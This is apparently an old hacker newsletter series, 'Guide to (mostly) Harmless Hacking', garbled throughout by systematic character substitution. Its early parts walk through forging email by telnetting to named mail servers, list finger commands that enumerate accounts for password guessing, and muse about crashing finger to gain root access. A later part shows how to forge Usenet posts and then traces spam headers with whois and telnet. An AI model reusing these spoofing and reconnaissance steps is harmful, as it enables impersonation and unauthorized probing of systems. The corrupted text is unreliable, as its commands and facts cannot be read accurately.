anyhow& *gain( my in.ut has no numbers in front( while the res.onses of the com.uter are .refaced by the number -5M: mail from:santaJnorth&.ole&com -5M santaJnorth&.ole&com&&& Sender is <alid& rc.t to:cmeinelJnmia&com -5M cmeinelJnmia&com&&& 5eci.ient is <alid& data %5G 3nter mail& 3nd with the & character on a line by itself& 1t works & -5M 4k @uit --, 1nter7ink&"3#: closing the connection& 48( what kind of email did that com.uter generate? Here's what 1 saw using +ine: 5eturn +ath: ^santaJnorth&.ole&orgV 5ecei<ed: from 1nter7ink&"3# by nmia&com with smt. !7inu' Smail%&,&-D&, 9G$ id mMueoKt MMM738/A Hri( ,- Rul 9E ,%:G% 62# 5ecei<ed: from .lato&nmia&com by 1nter7ink&"3# !*1U %&-I0/B 5&EGIG&M%$ id **-%9MMA Hri( ,- Rul ,99E ,5:G%:-M MGMM 4o.s& Here the 1nter7ink&"3# com.uter has re<ealed the com.uter 1 was on when 1 telnetted to its .ort -5& Howe<er( many .eo.le use that 1nternet host com.uter& 2ate: Hri( ,- Rul ,99E ,5:G%:-M MGMM Hrom: santaJnorth&.ole&org 6essage 1d: ^9EMK,-,9G%&**-%9MMJ1nter7ink&"3#V *..arently #o: cmeinelJnmia&com 1t worked 48( here it doesn't say :*..arently?Hrom(: so now 1 know the com.uter ns&1nterlink&"et is a .retty good one to send fake mail from& *n e'.erienced

email aficionado would know from the 5ecei<ed: line that this is fake mail& But its .honiness doesnbt =ust =um. out at you& 1'm going to try another com.uter& Hmmm( the 0ni<ersity of /alifornia at Berkeley is renowned for its com.uter sciences research& 1 wonder what their hosts are like? Ha<ing first looked u. the numerical 1nternet address of one of their machines( 1 gi<e the command: telnet ,-D&%-&,5-&,EG -5 1t res.onds with: #rying ,-D&%-&,5-&,EG&&& /onnected to ,-D&%-&,5-&,EG& 3sca.e character is 'BZ'& --M remar@ue&berkeley&edu 3S6#+ Sendmail D&K&%I,&%, ready at #hu( ,, Rul ,99E ,hel. -,G #his is Sendmail <ersion D&K&% -,G /ommands: -,G H374 3H74 6*17 5/+# 2*#* -,G 5S3# "44+ S01# H37+ C5H; -,G 3U+" C35B -,G Hor more info use :H37+ ^to.icV:& -,G #o re.ort bugs in the im.lementation send email to -,G sendmailJ/S&Berkeley&320& -,G Hor local information send email to +ostmaster at your site& -,G 3nd of H37+ info 4h( boy( a slightly different sendmail .rogram 1 wonder what more it will tell me about these commands? H37+ mail -,G 6*17 H546: ^senderV -,G S.ecifies the sender& -,G 3nd of H37+ info Big f)))ing deal 4h( well( let's see what this com.uter !which we now know is named remar@ue$ will do to fake mail& 6*17 H546:santaJnorth&.ole&org

-5M santaJnorth&.ole&org&&& Sender ok Heyyy&&& this is interesting &&& 1 didn't say :helo: and this sendmail .rogram didn't sla. me on the wrist Wonder what that means&&& 5/+# #4:cmeinelJtechbroker&com -5M 5eci.ient ok 2*#* %5G 3nter mail( end with :&: on a line by itself #his is fake mail on a Berkeley com.uter for which 1 do not ha<e a .assword& & -5M 6**-%GK- 6essage acce.ted for deli<ery @uit --, remar@ue&berkeley&edu closing connection "ow we go to +ine and see what the header looks like: 5eturn +ath: ^santaJnorth&.ole&orgV 5ecei<ed: from nmia&com by nmia&com with smt. !7inu' Smail%&,&-D&, 9G$ id mMue5nW MMM7Gi/A #hu( ,, Rul 9E ,%:5% 62# 5ecei<ed: from remar@ue&berkeley&edu by nmia&com with smt. !7inu' Smail%&,&-D&, 9G$ id mMue5nC MMM7Gh/A #hu( ,, Rul 9E ,%:5% 62# *..arently #o: ^cmeinelJtechbroker&comV 5ecei<ed: from merde&dis&org by remar@ue&berkeley&edu !D&K&%I,&%,$ id 6**-%GK-A #hu( ,, Rul ,99E ,-:G9:5E MKMM !+2#$ 7ook at the three `recei<eda messages& 6y 1S+bs com.uter recei<ed this email not directly from 5emar@ue&berkeley&edu& but from merde&dis&com( which in turn got the email from 5emar@ue& Hey( 1 know who owns merde&dis&org So the Berkeley com.uter forwarded this fake mail through famed com.uter security e'.ert +ete Shi.ley's 1nternet host com.uter Hint: the name :merde: is a =oke& So is `dis&org&a

"ow letbs see what email from remar@ue looks like& 7etbs use +ine again: 2ate: #hu( ,, Rul ,99E ,-:G9:5E MKMM !+2#$ Hrom: santaJnorth&.ole&org 6essage 1d: ^,99EMK,,,9G9&6**-%GK-Jremar@ue&berkeley&eduV #his is fake mail on a Berkeley com.uter for which 1 do not ha<e a .assword& Hey( this is .retty kewl& 1t doesn't warn that the Santa address is .hony 3<en better( it kee.s secret the name of the originating com.uter: .lato&nmia&com& #hus remar@ue&berkeley&edu was a really good com.uter from which to send fake mail& !"ote: last time 1 checked( they had fi'ed remar@ue( so donbt bother telnetting there&$ But not all sendmail .rograms are so friendly to fake mail& /heck out the email 1 created from atro.os&c-&org telnet atro.os&c-&org -5 #rying ,GM&,KG&,D5&,G&&& /onnected to atro.os&c-&org& 3sca.e character is 'BZ'& --M atro.os&c-&org 3S6#+ Sendmail D&K&GI/S0* ready at Hri( ,- Rul ,99E ,5:G,:%% hel. 5M- Sendmail D&K&G H37+ not im.lemented Gee( you're .retty sni..y today( aren't you&&& What the heck( let's .low ahead anyhow&&& helo santaJnorth&.ole&org 5M, 1n<alid domain name Hey( what's it to you( buddy? 4ther sendmail .rograms don't gi<e a darn what name 1 use with :helo&: 48( 48( 1'll gi<e you a <alid domain name& But not a <alid user name helo satanJunm&edu -5M atro.os&c-&org Hello cmeinelJ.lato&nmia&com Y,9D&59&,EE&,E5Z( .leased to meet you

Cerrrry funny( .al& 1'll =ust bet you're .leased to meet me& Why the 9PNJ did you demand a <alid domain name when you knew who 1 was all along? mail from:santaJnorth&.ole&com -5M santaJnorth&.ole&com&&& Sender ok rc.t to: cmeinelJnmia&com -5M 5eci.ient ok data %5G 3nter mail( end with :&: on a line by itself 4h( cra. & -5M +**,%G%K 6essage acce.ted for deli<ery @uit --, atro.os&c-&org closing connection 48( what kind of email did that obno'ious little sendmail .rogram generate? 1 rush o<er to +ine and take a look: 5eturn +ath: ^santaJnorth&.ole&comV Well( how <ery nice to allow me to use my fake address& 5ecei<ed: from atro.os&c-&org by nmia&com with smt. !7inu' Smail%&,&-D&, 9G$ id mMue@'h MMM729/A Hri( ,- Rul 9E ,E:G5 62# *..arently #o: ^cmeinelJnmia&comV 5ecei<ed: from satan&unm&edu !cmeinelJ.lato&nmia&com Y,9D&59&,EE&,E5Z$ 4h( how truly s.ecial "ot only did the com.uter atro.os&c-&org blab out my true identity( it also re<ealed that satan&unm&edu thing& Grum.&&& that will teach me& by atro.os&c-&org !D&K&GI/S0*$ with S6#+ id +**,%G%K for cmeinelJnmia&comA Hri( ,Rul ,99E ,5:GG:%K MKMM !+2#$ 2ate: Hri( ,- Rul ,99E ,5:GG:%K MKMM !+2#$ Hrom: santaJnorth&.ole&com 6essage 1d: ^,99EMK,---GG&+**,%G%KJatro.os&c-&orgV

4h( cra. So( the moral of that little hack is that there are lots of different email .rograms floating around on .ort -5 of 1nternet hosts& So if you want to ha<e fun with them( it's a good idea to check them out first before you use them to show off with& G0123 #4 !mostly$ H*5673SS H*/81"G Col& , "umber % How finger can be used to crack into an 1nternet host& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF Before you get too e'cited o<er learning how finger can be used to crack an 1nternet host( will all you law enforcement folks out there .lease rela'& 1bm not gi<ing ste.?by?ste. instructions& 1bm certainly not handing out code from those .ublicly a<ailable canned cracking tools that any newbie could use to gain illegal access to some hosts& What you are about to read are some basic .rinci.les and techni@ues behind cracking with finger& 1n fact( some of these techni@ues are fun and legal as long as they arenbt taken too far& *nd they might tell you a thing or two about how to make your 1nternet hosts more secure& ;ou could also use this information to become a cracker& ;our choice& Rust kee. in mind what it would be like to be the `girlfrienda of a cell mate named `S.ike&a ))))))))))))))))))))))))))))))))) "ewbie note 9,: 6any .eo.le assume `hackinga and `crackinga are synonymous& But `crackinga is gaining illegal entry into a com.uter& `Hackinga is the entire uni<erse of kewl stuff one can do with com.uters( often without breaking the law or causing harm& ))))))))))))))))))))))))))))))))) What is finger? 1t is a .rogram which runs on .ort K9 of many 1nternet host com.uters& 1t is normally used to .ro<ide information on .eo.le who are users of a gi<en com.uter&

Hor re<iew( letbs consider the <irtuous but boring way to gi<e your host com.uter the finger command: finger RoeFBlowJboring&1S+&net #his causes your com.uter to telnet to .ort K9 on the host boring&1S+&net& 1t gets whate<er is in the &.lan and &.ro=ect files for Roe Blow and dis.lays them on your com.uter screen& But the Ha..y Hacker way is to first telnet to boring&1S+&net .ort K9( from which we can then run its finger .rogram: telnet boring&1S+&net K9 1f you are a good 1nternet citi>en you would then gi<e the command: RoeFBlow or maybe the command: finger RoeFBlow #his should gi<e you the same results as =ust staying on your own com.uter and gi<ing the command `finger RoeFBlowJboring&1S+&net&a But for a cracker( there are lots and lots of other things to try after gaining control of the finger .rogram of boring&1S+&net by telnetting to .ort K9& *h( but 1 donbt teach how to do felonies& So we will =ust co<er general .rinci.les of how finger is commonly used to crack into boring&1S+&net& ;ou will also learn some .erfectly legal things you can try to get finger to do& Hor e'am.le( some finger .rograms will res.ond to the command: finger Jboring&1S+&net 1f you should ha..en to find a finger .rogram old enough or trusting enough to acce.t this command( you might get something back like: Yboring&1S+&netZ

7ogin "ame ha..y +rof& Hoobar

##; 1dle When Where co ,d Wed MD:MM boring&1S+&net

#his tells you that only one guy is logged on( and hebs doing nothing& #his means that if someone should manage to break in( no one is likely to notice ?? at least not right away& *nother command to which a finger .ort might res.ond is sim.ly: finger 1f this command works( it will gi<e you a com.lete list of the users of this host& #hese user names then can be used to crack a .assword or two& Sometimes a system will ha<e no restrictions on how lame a .assword can be& /ommon lame .assword habits are to use no .assword at all( the same .assword as user name( the userbs first or last name( and `guest&a 1f these donbt work for the cracker( there are widely circulated .rograms which try out e<ery word of the dictionary and e<ery name in the ty.ical .hone book& )))))))))))))))))))))))))))))))) "ewbie "ote 9-: 1s your .assword easy to crack? 1f you ha<e a shell account( you may change it with the command: .asswd /hoose a .assword that isnbt in the dictionary or .hone book( is at least E characters long( and includes some characters that are not letters of the al.habet& * .assword that is found in the dictionary but has one e'tra character is )not) a good .assword& )))))))))))))))))))))))))))))))) 4ther commands which may sometimes get a res.onse out of finger include: finger J finger M finger root finger bin finger ft.

finger system finger guest finger demo finger manager 4r( e<en =ust hitting ^enterV once you are into .ort K9 may gi<e you something interesting& #here are .lenty of other commands that may or may not work& But most commands on most finger .rograms will gi<e you nothing( because most system administrators donbt want to ladle out lots of information to the casual <isitor& 1n fact( a really cautious sysadmin will disable finger entirely& So youbll ne<er e<en manage to get into .ort K9 of some com.uters Howe<er( none of these commands 1 ha<e shown you will gi<e you root access& #hey .ro<ide information only& )))))))))))))))))))))))) "ewbie note 9%: 5oot 1t is the Calhalla of the hard?core cracker& `5oota is the account on a multi?user com.uter which allows you to .lay god& 1t is the account from which you can enter and use any other account( read and modify any file( run any .rogram& With root access( you can com.letely destroy all data on boring&1S+&net& !1 am )not) suggesting that you do so $ ))))))))))))))))))))))))) 1t is legal to ask the finger .rogram of boring&1S+&net =ust about anything you want& #he worst that can ha..en is that the .rogram will crash& /rash&&&what ha..ens if finger crashes? 7etbs think about what finger actually does& 1tbs the first .rogram you meet when you telnet to boring&1S+&netbs .ort K9& *nd once there( you can gi<e it a command that directs it to read files from any userbs account you may choose& #hat means finger can look in any account& #hat means if it crashes( you may end u. in root& +lease( if you should ha..en to gain root access to someone elsebs host( lea<e that com.uter immediately ;oubd better also ha<e a good e'cuse for your systems administrator and the co.s if you should get caught

1f you were to make finger crash by gi<ing it some command like III)BS( you might ha<e a hard time claiming that you were innocently seeking .ublicly a<ailable information& ))))))))))))))))) ;40 /*" G4 #4 R*17 #1+ 9,: Getting into a .art of a com.uter that is not o.en to the .ublic is illegal& 1n addition( if you use the .hone lines or 1nternet across a 0S state line to break into a non?.ublic .art of a com.uter( you ha<e committed a Hederal felony& ;ou donbt ha<e to cause any harm at all ?? itbs still illegal& 3<en if you =ust gain root access and immediately break off your connection ?? itbs still illegal& ))))))))))))))) #ruly elite ty.es will crack into a root account from finger and =ust lea<e immediately& #hey say the real rush of cracking comes from being )able) to do anything to boring&1S+&net ?? but refusing the tem.tation& #he elite of the elite do more than =ust refrain from taking ad<antage of the systems they .enetrate& #hey inform the systems administrator that they ha<e cracked his or her com.uter( and lea<e an e'.lanation of how to fi' the security hole& )))))))))))))))))))))))))))))))))))) ;40 /*" G4 #4 R*17 #1+ 9-: When you break into a com.uter( the headers on the .ackets that carry your commands tell the sysadmin of your target who you are& 1f you are reading this column you donbt know enough to co<er your tracks& #ell tem.tation to take a hike )))))))))))))))))))))))))))))))))))) *h( but what are your chances of gaining root through finger? Ha<enbt >illions of hackers found all the crashable stu.h? 2oesnbt that suggest that finger .rograms running on the 1nternet today are all fi'ed so you canbt get root access through them any more? "o& #he bottom line is that any systems adminstrator that lea<es the finger ser<ice running on hisIher system is taking a ma=or risk& 1f you are the user of an 1S+ that allows finger( ask yourself this @uestion: is using it to ad<ertise your e'istence across the 1nternet worth the risk?

G0123 #4 !mostly$ H*5673SS H*/81"G Col& , "umber G 1tbs <igilante .hun day How get 0senet s.ammers kicked off their 1S+s& FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF How do you like it when your sober news grou.s get hit with 9MM number se' ads and 6ake 6oney Hast .yramid schemes? 1f no one e<er made those guys .ay for their effrontery( soon 0senet would be inundated with crud& 1tbs really tem.ting( isnbt it( to use our hacking knowledge to blow these guys to kingdom come& But many times thatbs like using an atomic bomb to kill an ant& Why risk going to =ail when there are legal ways to kee. these <ermin of the 1nternet on the run? #his issue of Ha..y hacker will show you some ways to fight 0senet s.am& S.ammers rely on forged email and 0senet .osts& *s we learned in the second Guide to !mostly$ Harmless Hacking( it is easy to fake email& Well( itbs also easy to fake 0senet .osts& ))))))))))))))))) "ewbie "ote 9,: 0senet is a .art of the 1nternet consisting of the system of on?line discussion grou.s called :news grou.s&: 3'am.les of news grou.s are rec&humor( com.&misc( news&announce&newusers( sci&s.ace&.olicy( and alt&se'& #here are well o<er ,M(MMM news grou.s& 0senet started out in ,9DM as a 0ni' network linking .eo.le who wanted ?? you guessed it ?? to talk about 0ni'& #hen some of the .eo.le wanted to talk about stuff like .hysics( s.ace flight( barroom humor( and se'& #he rest is history& ))))))))))))))))) Herebs a @uick summary of how to forge 0senet .osts& 4nce again( we use the techni@ue of telnetting to a s.ecific .ort& #he 0senet .ort usually is o.en only to those with accounts on that system& So you will need to telnet from your 1S+ shell account back into your own 1S+ as follows: telnet news&my1S+&com nnt.

where you substitute the .art of your email address that follows the J for `my1S+&com&a ;ou also ha<e the choice of using `,,9a instead of `nnt.&a With my 1S+ 1 get this result: #rying ,9D&59&,,5&-5 &&& /onnected to sloth&swc.&com& 3sca.e character is 'BZ'& -MM sloth&swc.&com 1nter"et"ews ""5+ ser<er 1"" ,&GunoffG M5? 6ar? 9E ready !.osting$ "ow when we are suddenly in a .rogram that we donbt know too well( we ask for: hel. *nd we get: ,MM 7egal commands authinfo user "ame_.ass +assword_generic ^.rogV ^argsV article Y6essage12_"umberZ body Y6essage12_"umberZ date grou. newsgrou. head Y6essage12_"umberZ hel. iha<e last list Yacti<e_newsgrou.s_distributions_schemaZ listgrou. newsgrou. mode reader newgrou.s yymmdd hhmmss Y:G6#:Z Y^distributionsVZ newnews newsgrou.s yymmdd hhmmss Y:G6#:Z Y^distributionsVZ ne't .ost sla<e stat Y6essage12_"umberZ 'gtitle Ygrou.F.atternZ 'hdr header Yrange_6essage12Z 'o<er YrangeZ '.at header range_6essage12 .at Ymore.at&&&Z

'.ath 6essage12 5e.ort .roblems to ^usenetJswc.&comV 0se your imagination with these commands& *lso( if you want to forge .osts from an 1S+ other than your own( kee. in mind that some 1nternet host com.uters ha<e an nnt. .ort that re@uires either no .assword or an easily guessed .assword such as `.ost&a But?? it can be @uite an effort to find an undefended nnt. .ort& So( because you usually ha<e to do this on your own 1S+( this is much harder than email forging& Rust remember when forging 0senet .osts that both faked email and 0senet .osts can be easily detected ?? if you know what to look for& *nd it is .ossible to tell where they were forged& 4nce you identify where s.am really comes from( you can use the message 12 to show the sysadmin who to kick out& "ormally you wonbt be able to learn the identity of the cul.rit yourself& But you can get their 1S+s to cancel their accounts Sure( these S.am 8ing ty.es often resurface with yet another gullible 1S+& But they are always on the run& *nd( hey( when was the last time you got a /ra>y 8e<in `*ma>ing Hree 4ffer?a 1f it werenbt for us "et <igilantes( your email bo'es and news grou.s would be constantly s.ambombed to kingdom come& *nd ?? the s.am attack 1 am about to teach you is .erfectly legal 2o it and you are a certifiable Good Guy& 2o it at a .arty and teach your friends to do it( too& We canbt get too many s.am <igilantes out there #he first thing we ha<e to do is re<iew how to read headers of 0senet .osts and email& #he header is something that shows the route that email or 0senet .ost took to get into your com.uter& 1t gi<es the names of 1nternet host com.uters that ha<e been used in the creation and transmission of a message& When something has been forged( howe<er( the com.uter names may be fake& *lternati<ely( the skilled forger may use the names of real hosts& But the skilled hacker can tell whether a host listed in the header was really used& Hirst webll try an e'am.le of forged 0senet s.am& * really good .lace to s.ot s.am is in alt&.ersonals& 1t is not nearly as well .oliced by anti?s.am <igilantes as( say( rec&a<iation&military& !+eo.le s.am fighter .ilots at their own risk $

So here is a ri.e e'am.le of scam s.am( as shown with the 0ni'?based 0senet reader( `tin&a #hu( -- *ug ,99E -%:M,:5E alt&.ersonals #hread ,%G of G5M 7ines ,,M VVVVH533 1"S#*"# /46+*#1B171#; /H3/8 H45 S37 "o res.onses ..gcJo>email&com&au glennys e clarke at 4>3mail +ty 7td ? *ustralia /71/8 H353 H45 ;405 H533 1"S#*"# /46+*#1B171#; /H3/8 htt.:IIwww&.erfect?.artners&com&au WH; S373/#1C3 S1"G73S /H44S3 0S *t +erfect +artners !"ewcastle$ 1nternational we are .ri<ate and confidential& We introduce ladies and gentlemen for friendshi. and marriage& With o<er ,5 years e'.erience( +erfect +artners is one of the 1nternet's largest( most successful relationshi. consultants& 4f course the first thing that =um.s out is their return email address& 0s net <igilantes used to always send a co.y back to the s.ammerbs email address& 4n a well?read grou. like alt&.ersonals( if only one in a hundred readers throws the s.am back into the .osterbs face( thatbs an a<alanche of mail bombing& #his a<alanche immediately alerts the sysadmins of the 1S+ to the .resence of a s.ammer( and good?bye s.am account& So in order to delay the ine<itable <igilante res.onse( today most s.ammers use fake email addresses& But =ust to be sure the email address is .hony( 1 e'it tin and at the 0ni' .rom.t gi<e the command: whois o>email&com&au We get the answer: "o match for :4Q36*17&/46&*0:

#hat doesnbt .ro<e anything( howe<er( because the `aua at the end of the email address means it is an *ustralian address& 0nfortunately `whoisa does not work in much of the 1nternet outside the 0S& #he ne't ste. is to email something annoying to this address& * co.y of the offending s.am is usually annoying enough& But of course it bounces back with a no such address message& "e't 1 go to the ad<ertised Web .age& 7o and behold( it has an email address for this outfit( .erfect&.artnersJhunterlink&net&au& Why am 1 not sur.rised that it is different from the address in the alt&.ersonals s.am? We could sto. right here and s.end an hour or two emailing stuff with 5 6B attachments to .erfect&.artnersJhunterlink&net&au& Hmmm( maybe gifs of mating hi..o.otami? ))))))))))))))))))))))))))) ;ou can go to =ail note 6ailbombing is a way to get into big trouble& *ccording to com.uter security e'.ert 1ra Winkler( `1t is illegal to mail bomb a s.am& 1f it can be shown that you maliciously caused a financial loss( which would include causing hours of work to reco<er from a s.amming( you are criminally liable& 1f a system is not configured .ro.erly( and has the mail directory on the system dri<e( you can take out the whole system& #hat makes it e<en more criminal&a ))))))))))))))))))))))))))) Sigh& Since intentional mailbombing is illegal( 1 canbt send that gif of mating hi..o.otami& So what 1 did was email one co.y of that s.am back to .erfect&.artners& "ow this might seem like a wim.y retaliation& *nd we will shortly learn how to do much more& But e<en =ust sending one email message to these guys may become .art of a tidal wa<e of .rotest that knocks them off the 1nternet& 1f only one in a thousand .eo.le who see their s.am go to their Web site and email a .rotest( they still may get thousands of .rotests from e<ery .ost& #his high <olume of email may be enough to alert their 1S+bs sysadmin to s.amming( and good?bye s.am account& 7ook at what 1S+ ownerIo.erator 2ale *mon has to say about the .ower of email .rotest: `4ne doesn't ha<e to call for a dmail bomb&b 1t =ust ha..ens& Whene<er 1 see s.am( 1 automatically send one co.y of their message back to them& 1 figure

that thousands of others are doing the same& 1f they !the s.ammers$ hide their return address( 1 find it and .ost it if 1 ha<e time& 1 ha<e no com.unctions and no guilt o<er it&a "ow 2ale is also the owner and technical director of the largest and oldest 1S+ in "orthern 1reland( so he knows some good ways to ferret out what 1S+ is harboring a s.ammer& *nd we are about learn one of them& 4ur ob=ecti<e is to find out who connects this outfit to the 1nternet( and take out that connection Belie<e me( when the .eo.le who run an 1S+ find out one of their customers is a s.ammer( they usually waste no time kicking him or her out& 4ur first ste. will be to dissect the header of this .ost to see how it was forged and where& Since my newsreader !tin$ doesnbt ha<e a way to show headers( 1 use the `ma command to email a co.y of this .ost to my shell account& 1t arri<es a few minutes later& 1 o.en it in the email .rogram `+inea and get a richly detailed header: +ath: sloth&swc.&com news&ironhorse&com news&uoregon&edu <i'en&cso&uiuc&edu ne ws&stealth&net nnt.MG&.rimenet&com nnt.&.rimenet&com gatech nnt.M&minds.ri ng&com news&minds.ring&com uunet in-&uu&net 4>3mail 4>3mail?1n news Hrom: glennys e clarke ^..gcJo>email&com&auV ""#+?+osting?Host: -M%&,5&,EE&GE 6ime?Cersion: ,&M /ontent?#y.e: te'tI.lain /ontent?#ransfer?3ncoding: Kbit U?6ailer: 6o>illa ,&-- !WindowsA 1A ,Ebit$ #he first item in this header is definitely genuine: sloth&swc.&com& 1tbs the com.uter my 1S+ uses to host the news grou.s& 1t was the last link in the chain of com.uters that ha<e .assed this s.am around the world& ))))))))))))))))))) "ewbie "ote 9-: 1nternet host com.uters all ha<e names which double as their "et addresses& `Slotha is the name of one of the com.uters owned by the com.any which has the `domain namea swc.&com& So `slotha is kind of

like the news ser<er com.uterbs first name( and `swc.&coma the second name& `Slotha is also kind of like the street address( and `swc.&coma kind of like the city( state and >i. code& `Swc.&coma is the domain name owned by Southwest /yber.ort& *ll host com.uters also ha<e numerical <ersions of their names( e&g& -M%&,5&,EE&GE& ))))))))))))))))))) 7etbs ne't do the ob<ious& #he header says this .ost was com.osed on the host -M%&,5&,EE&GE& So we telnet to its nnt. ser<er !.ort ,,9$: telnet -M%&,5&,EE&GE ,,9 We get back: #rying -M%&,5&,EE&GE &&& telnet: connect: /onnection refused #his looks a lot like a .hony item in the header& 1f this really was a com.uter that handles news grou.s( it should ha<e a nnt. .ort that acce.ts <isitors& 1t might only acce.t a <isitor for the s.lit second it takes to see that 1 am not authori>ed to use it& But in this case it refuses any connection whate<er& #here is another e'.lanation: there is a firewall on this com.uter that filters out .ackets from anyone but authori>ed users& But this is not common in an 1S+ that would be ser<ing a s.ammer dating ser<ice& #his kind of firewall is more commonly used to connect an internal com.any com.uter network with the 1nternet& "e't 1 try to email .ostmasterJ-M%&,5&,EE&GE with a co.y of the s.am& But 1 get back: 2ate: Wed( -D *ug ,99E -,:5D:,% ?MEMM Hrom: 6ail 2eli<ery Subsystem ^6*1735?2*364"Jtechbroker&comV #o: cmeinelJtechbroker&com Sub=ect: 5eturned mail: Host unknown !"ame ser<er: -M%&,5&,EE&GE: host not found$ #he original message was recei<ed at Wed( -D *ug ,99E -,:5D:ME ?MEMM from cmeinelJlocalhost

????? #he following addresses had deli<ery .roblems ????? .ostmasterJ-M%&,5&,EE&GE !unreco<erable error$ ????? #ranscri.t of session follows ????? 5M, .ostmasterJ-M%&,5&,EE&GE&&& 55M Host unknown !"ame ser<er: -M%&,5&,EE&GE: host not found$ ????? 4riginal message follows ????? 5eturn?+ath: cmeinel 5ecei<ed: !from cmeinelJlocalhost$ by kitsune&swc.&com !D&E&9ID&E&9$ id 48( it looks like the nnt. ser<er info was forged( too& "e't we check the second from the to. item on the header& Because it starts with the word `news(a 1 figure it must be a com.uter that hosts news grou.s( too& So 1 check out its nnt. .ort: telnet news&ironhorse&com nnt. *nd the result is: #rying -MG&,G5&,EK&G &&& /onnected to bo'car&ironhorse&com& 3sca.e character is 'BZ'& 5M- ;ou ha<e no .ermission to talk& Goodbye& /onnection closed by foreign host 48( we now know that this .art of the header references a real news ser<er& 4h( yes( we ha<e also =ust learned the nameIaddress of the com.uter ironhorse&com uses to handle the news grou.s: `bo'car&a 1 try the ne't item in the .ath: telnet news&uoregon&edu nnt. *nd get: #rying ,-D&--%&--M&-5 &&& /onnected to .ith&uoregon&edu& 3sca.e character is 'BZ'&

5M- ;ou ha<e no .ermission to talk& Goodbye& /onnection closed by foreign host& 48( this one is a <alid news ser<er( too& "ow letbs =um. to the last item in the header: in-&uu&net: telnet in-&uu&net nnt. We get the answer: in-&uu&net: unknown host #here is something fishy here& #his host com.uter in the header isnbt currently connected to the 1nternet& 1t .robably is forged& 7etbs check the domain name ne't: whois uu&net #he result is: 00"3# #echnologies( 1nc& !00?246$ %MEM Williams 2ri<e Ste EM, Hairfa'( C* --M%, 0S* 2omain "ame: 00&"3# *dministrati<e /ontact( #echnical /ontact( Qone /ontact: 00"3#( *lter"et Y#echnical Su..ortZ !4*,-$ hel.J00"3#&00&"3# X, !DMM$ 9MM?M-G, Billing /ontact: +ayable( *ccounts !+*,M?45G$ a.J00&"3# !KM%$ -ME?5EMM Ha': !KM%$ EG,?KKM5ecord last u.dated on -%?Rul?9E& 5ecord created on -M?6ay?DK& 2omain ser<ers in listed order: "S&00&"3# ,%K&%9&,&%

00/+?GW?,&+*&23/&/46 ,E&,&M&,D -MG&,-%&-&,D 00/+?GW?-&+*&23/&/46 ,E&,&M&,9 "S&30&"3# ,9-&,E&-M-&,, #he 1nter"1/ 5egistration Ser<ices Host contains 4"7; 1nternet 1nformation !"etworks( *S"'s( 2omains( and +4/'s$& +lease use the whois ser<er at nic&ddn&mil for 617"3# 1nformation& So uu&net is a real domain& But since the host com.uter in-&uu&net listed in the header isnbt currently connected to the 1nternet( this .art of the header may be forged& !Howe<er( there may be other e'.lanations for this( too&$ Working back u. the header( then( we ne't try: telnet news&minds.ring&com nnt. 1 get: #rying -MG&,DM&,-D&,D5 &&& /onnected to news&minds.ring&com& 3sca.e character is 'BZ'& 5M- ;ou are not in my access file& Goodbye& /onnection closed by foreign host& 1nteresting& 1 donbt get a s.ecific host name for the nnt. .ort& What does this mean? Well( therebs a way to try& 7etbs telnet to the .ort that gi<es the login se@uence& #hatbs .ort -%( but telnet automatically goes to -% unless we tell it otherwise: telnet news&minds.ring&com "ow this is .hun #rying -MG&,DM&,-D&,EE &&& telnet: connect to address -MG&,DM&,-D&,EE: /onnection refused #rying -MG&,DM&,-D&,EK &&& telnet: connect to address -MG&,DM&,-D&,EK: /onnection refused #rying -MG&,DM&,-D&,ED &&& telnet: connect to address -MG&,DM&,-D&,ED: /onnection refused #rying -MG&,DM&,-D&,D- &&&

telnet: connect to address -MG&,DM&,-D&,D-: /onnection refused #rying -MG&,DM&,-D&,D5 &&& telnet: connect: /onnection refused "otice how many host com.uters are tried out by telnet on this command #hey must all s.eciali>e in being news ser<ers( since none of them handles logins& #his looks like a good candidate for the origin of the s.am& #here are 5 news ser<er hosts& 7etbs do a whois command on the domain name ne't: whois minds.ring&com We get: 6indS.ring 3nter.rises( 1nc& !61"2S+51"G?246$ ,G%M West +eachtree Street "3 Suite GMM *tlanta( G* %M%M9 0S* 2omain "ame: 61"2S+51"G&/46 *dministrati<e /ontact: "i'on( R& Hred !RH"$ =ni'onJ61"2S+51"G&/46 GMG?D,5?MKKM #echnical /ontact( Qone /ontact: *hola( 3sa !3*55$ hostmasterJ61"2S+51"G&/46 !GMG$D,5?MKKM Billing /ontact: +ea<ler( 8& *nne !8*+G$ .ea<lerJ61"2S+51"G&/46 GMG?D,5?MKKM !H*U$ GMG?D,5?DDM5 5ecord last u.dated on -K?6ar?9E& 5ecord created on -,?*.r?9G& 2omain ser<ers in listed order: /*5"*/&61"2S+51"G&/46 H3"51&61"2S+51"G&/46 -MG&,DM&,-D&95 -MG&,DM&,-D&%

))))))))))))))))))))) "ewbie "ote 9%: #he whois command can tell you who owns a domain name& #he domain name is the last two .arts se.arated by a .eriod that comes after the `Ja in an email address( or the last two .arts se.arated by a .eriod in a com.uterbs name& ))))))))))))))))))))) 1bd say that 6inds.ring is the 1S+ from which this .ost was most likely forged& #he reason is that this .art of the header looks genuine( and offers lots of com.uters on which to forge a .ost& * letter to the technical contact at hostmasterJminds.ring&com with a co.y of this .ost may get a result& But .ersonally( 1 would sim.ly go to their Web site and email them a .rotest from there& Hmmm( maybe a 5 6B gif of mating hi..os? 3<en if it is illegal? But systems administrator #erry 6c1ntyre cautions me: `4ne needn't toss megabyte files back ! unless( of course( one is hel.fully mailing a co.y of the offending .iece back( =ust so that the .oster knows what the trouble was& $ `#he 7aw of 7arge "umbers of 4ffendees works to your ad<antage& S.ammer sends one .ost to dreach out and touchb thousands of .otential customers& `#housands of S.ammees send back oh?so?.olite notes about the im.ro.er beha<ior of the S.ammer& 6ost S.ammers get the .oint fairly @uickly& `4ne note ? one FwrongF thing to do is to .ost to the newsgrou. or list about the ina..ro.riateness of any .re<ious .ost& *lways( always( use .ri<ate email to make such com.laints& 4therwise( the newbie inad<ertently am.lifies the noise le<el for the readers of the newsgrou. or email list&a Well( the bottom line is that if 1 really want to .ull the .lug on this s.ammer( 1 would send a .olite note including the 0senet .ost with headers intact to the technical contact andIor .ostmaster at each of the <alid links 1 found in this s.am header& /hances are that they will thank you for your sleuthing& Herebs an e'am.le of an email 1 got from "etcom about a s.ammer 1 hel.ed them to track down&

